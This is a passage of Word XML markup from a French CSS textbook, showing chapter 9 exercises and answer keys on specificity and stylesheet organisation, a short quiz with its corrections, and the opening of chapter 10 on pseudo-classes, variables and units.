        <w:t>&lt;div id="contenu"&gt;&lt;p class="alerte"&gt;Texte&lt;/p&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proposez trois corrections, dont une sans toucher au HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 9.3 — Organiser une feuille de style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ORGANISATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Réorganisez ce fichier de 300 lignes en sections lisibles.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Ajoutez un sommaire en commentaire.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Regroupez les règles par fonction : base, mise en page, composants.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 xml:space="preserve">Supprimez les doublons et les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inutiles.</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9.1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body {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: system-ui, -apple-system, "Segoe UI", sans-serif;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #1f2933;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.65;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  max-width: 42rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin: 0 auto;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 2rem 1.25rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>h1 { color: #0f2e4c; font-size: 2.25rem; line-height: 1.15; }</w:t>
        <w:br/>
        <w:t>h2 { color: #274b6d; font-size: 1.5rem; margin-top: 2.5rem; }</w:t>
        <w:br/>
        <w:t>.intro {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-left: 4px solid #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-left: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-size: 1.125rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>max-width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>margin: auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> centrent le contenu sans positionnement absolu. C'est la base d'une colonne de lecture confortable : 60 à 75 caractères par ligne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les tailles en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se rapportent à la taille de police racine, ce qui respecte les préférences de l'utilisateur. Les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> figent la taille.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 9.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'identifiant vaut 1-0-0, la classe 0-1-0 : le sélecteur avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#contenu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> gagne, quelle que soit la position de la règle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Corrections possibles : réduire la spécificité de la règle d'identifiant (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.contenu p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), augmenter celle de l'alerte (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>p.alerte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, insuffisant ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.contenu .alerte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffit), ou introduire des couches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour déclarer l'ordre d'importance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La correction durable consiste à supprimer les identifiants du style : ils sont prévus pour les ancres et le JavaScript, pas pour la présentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 9.3</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w:t>
        <w:br/>
        <w:t xml:space="preserve">   Sommaire</w:t>
        <w:br/>
        <w:t xml:space="preserve">   1. Variables et réglages de base</w:t>
        <w:br/>
        <w:t xml:space="preserve">   2. Typographie</w:t>
        <w:br/>
        <w:t xml:space="preserve">   3. Mise en page</w:t>
        <w:br/>
        <w:t xml:space="preserve">   4. Composants</w:t>
        <w:br/>
        <w:t xml:space="preserve">   5. Utilitaires</w:t>
        <w:br/>
        <w:t xml:space="preserve">   6. Adaptations (media queries)</w:t>
        <w:br/>
        <w:t>========================================================================== */</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* 1. Variables ------------------------------------------------------------</w:t>
        <w:br/>
        <w:t xml:space="preserve">  */</w:t>
        <w:br/>
        <w:t>:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte: #1f2933;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-primaire: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace: 1rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un sommaire en tête de fichier permet de retrouver une section en quelques secondes. Il doit être mis à jour quand le fichier évolue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les variables CSS centralisent les décisions visuelles : changer la couleur primaire ne demande qu'une modification. Nous les approfondissons au chapitre 17.</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Quelle méthode d'intégration du CSS est recommandée en production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 xml:space="preserve">L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>style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 xml:space="preserve">La balise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;style&gt;</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La feuille externe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Les trois sont équivalentes</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 xml:space="preserve">Quelle règle l'emporte entre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>p { color: red }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.intro { color: blue }</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La première, car elle est plus tôt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La seconde, car une classe pèse plus qu'un élément</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Les deux s'appliquent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Aucune, le conflit bloque le rendu</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Quelle propriété est héritée par défaut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margin</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border</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color</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display</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 xml:space="preserve">À quoi sert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@layer</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À créer des animations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À déclarer l'ordre de priorité entre groupes de règles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À importer des polices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À définir des variables</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 xml:space="preserve">Que signifie un sélecteur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h2 + p</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 xml:space="preserve">Tous les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> à l'intérieur d'un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>h2</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 xml:space="preserve">Le premier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui suit immédiatement un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>h2</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 xml:space="preserve">Tous les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui suivent un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>h2</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 xml:space="preserve">Les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> et les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> La feuille externe est mise en cache, partagée et maintenable ; les autres méthodes mélangent contenu et présentation.</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La spécificité de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.intro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0-1-0) est supérieure à celle de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0-0-1), quelle que soit la position.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> La couleur, la police et l'interligne s'héritent ; les marges, bordures et le mode d'affichage restent locaux.</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Les couches rendent l'ordre de la cascade explicite et évitent de recourir à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour arbitrer entre composants et utilitaires.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le combinateur de frère adjacent : il cible l'élément qui suit immédiatement, au même niveau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>10. Sélecteurs, variables et unités</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Écrire peu de CSS pour obtenir beaucoup : les outils qui rendent une feuille de style maintenable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Débutant · Prérequis : chapitre 9</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Utiliser les pseudo-classes et pseudo-éléments à bon escient.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Structurer une feuille de style avec des variables CSS.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Choisir la bonne unité de mesure selon le contexte.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Créer des sélecteurs robustes et faciles à faire évoluer.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Éviter les pièges de spécificité et de performance des sélecteurs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.1 Pseudo-classes : décrire un état</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une pseudo-classe cible un élément dans un état particulier : survolé, focalisé, coché, premier enfant, vide. Elle évite d'ajouter des classes que le JavaScript devrait maintenir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.34 — Treize pseudo-classes parmi les plus utiles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2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Pseudo-classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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 typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:hover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élément survolé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Boutons, liens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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:focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Élément focalisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Champs, liens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:focus-visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Focus visible au clavier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
